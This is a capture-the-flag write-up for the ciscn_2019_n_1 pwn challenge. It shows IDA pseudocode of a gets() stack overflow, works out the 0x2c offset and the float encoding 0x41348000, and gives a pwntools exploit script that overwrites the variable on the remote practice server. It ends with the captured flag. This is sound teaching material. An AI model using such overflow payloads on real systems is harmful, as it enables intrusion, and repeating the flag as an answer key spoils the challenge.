BUU-5-ciscn_2019_n_1
lxl@lxl-vm:~/BUU/ciscn_2019_n_11$ file ciscn_2019_n_1 ciscn_2019_n_1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8a733f5404b1e2c65e1758c7d92821eb8490f7c5, not stripped
lxl@lxl-vm:~/BUU/ciscn_2019_n_11$ checksec lxl@lxl-vm:~/BUU/ciscn_2019_n_11$ file ciscn_2019_n_1 usage: pwn checksec [-h] [--file [elf [elf ...]]] [elf [elf ...]] pwn checksec: error: argument elf: can't open 'lxl@lxl-vm:~/BUU/ciscn_2019_n_11$': [Errno 2] No such file or directory: 'lxl@lxl-vm:~/BUU/ciscn_2019_n_11$'
IDA 64
/*
 * IDA pseudocode of main(), reflowed onto separate lines so that the
 * decompiler's trailing "// rdi" annotation no longer swallows the rest of
 * the function body.
 *
 * Disables stdio buffering and hands control to func(); no argument
 * handling is visible here.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  FILE *v3; // rdi

  /* setvbuf mode 2 is _IONBF (unbuffered) on glibc.  IDA shows the first
   * stream as the _bss_start label; presumably this is stdout, whose
   * symbol sits at the start of .bss — verify in the disassembly. */
  setvbuf(_bss_start, 0LL, 2, 0LL);
  v3 = stdin;
  setvbuf(stdin, 0LL, 2, 0LL);
  /* func() is declared with no parameters below; the two arguments here
   * are a decompiler artefact of the register state at the call site. */
  func(v3, 0LL);
  return 0;
}
/*
 * IDA pseudocode of func(), reflowed so the "// eax" / "// [rsp+0h]" stack
 * annotations do not comment out the code that followed them on one line.
 *
 * Reads a line from stdin with gets() and runs "cat /flag" only if the
 * local float v2 equals 11.28125.  v2 is set to 0.0 and never written
 * afterwards, so that branch is unreachable through normal input; the
 * only thing that can change v2 is the unbounded gets() write into v1.
 *
 * Stack layout (from the decompiler annotations):
 *   v1 at rbp-0x30, v2 at rbp-0x4  ->  0x2c bytes between them.
 *
 * Defect: gets() has no length bound, so any input longer than v1's
 * slot overwrites v2, the saved rbp and the return address.  The
 * mitigation is a bounded read (fgets with the buffer size) — gets() was
 * removed from C11 for exactly this reason.
 */
int func()
{
  int result; // eax
  char v1; // [rsp+0h] [rbp-30h]
  float v2; // [rsp+2Ch] [rbp-4h]

  v2 = 0.0;
  puts("Let's guess the number.");
  gets(&v1); /* unbounded stack write — see header comment */
  /* 11.28125 is loaded from dword_4007F4 (41348000h) in .rodata; the
   * comparison is a single-precision float compare, so the bit pattern
   * written over v2 must be that exact encoding. */
  if ( v2 == 11.28125 )
    result = system("cat /flag");
  else
    result = puts("Its value should be 11.28125");
  return result;
}
gets可溢出,可以用v1覆盖v2的值,执行system(“cat /flag”)获取flag(初步想法)
很显然,我们只需要让v2等于11.28125就可以
我们能控制的是v1,位置在rbp-30h
而v2的位置在rbp-4h
所以覆盖量为0x30-0x4=0x2c
有一个问题是,浮点数不能直接转换成字符串str(11.28125),需要找到11.28125在程序中的表示41348000h(即11.28125的IEEE 754单精度编码,也就是func比较时从.rodata读取的那个dword)
.rodata:00000000004007D6 aItsValueShould db 'Its value should be 11.28125',0 .rodata:00000000004007D6 ; DATA XREF: func:loc_4006CF↑o .rodata:00000000004007F3 align 4 .rodata:00000000004007F4 dword_4007F4 dd 41348000h ; DATA XREF: func+31↑r .rodata:00000000004007F4 ; func+3F↑r .rodata:00000000004007F4 _rodata ends
EXP
# Exploit script from the write-up, reflowed one statement per line.
#
# Relies on the stack layout derived above: v1 sits 0x2c bytes below the
# float v2, and the comparison constant is the single-precision encoding
# 0x41348000 taken from .rodata.
#
# NOTE(review): 'a'*0x2c is a str while p64() returns bytes; this
# concatenation only works under Python 2, which matches the `python`
# invocation in the transcript below — confirm before reusing.
from pwn import *
# Remote challenge instance named in the write-up.
p=remote('node3.buuoj.cn',28677)
# 0x2c bytes of filler reach v2; p64 emits 8 bytes although v2 is a
# 4-byte float, so the upper zero bytes spill past it (presumably into the
# saved rbp) — the run below shows this was tolerated.
payload='a'*0x2c+p64(0x41348000)
p.sendline(payload)
p.interactive()
lxl@lxl-vm:~/BUU/ciscn_2019_n_11$ python ciscn_2019_n_1.py [+] Opening connection to node3.buuoj.cn on port 28677: Done [*] Switching to interactive mode Let's guess the number. flag{1d8f29c1-3618-4f4e-89fc-bdd4e4bc5e59} [*] Got EOF while reading in interactive $
flag{1d8f29c1-3618-4f4e-89fc-bdd4e4bc5e59}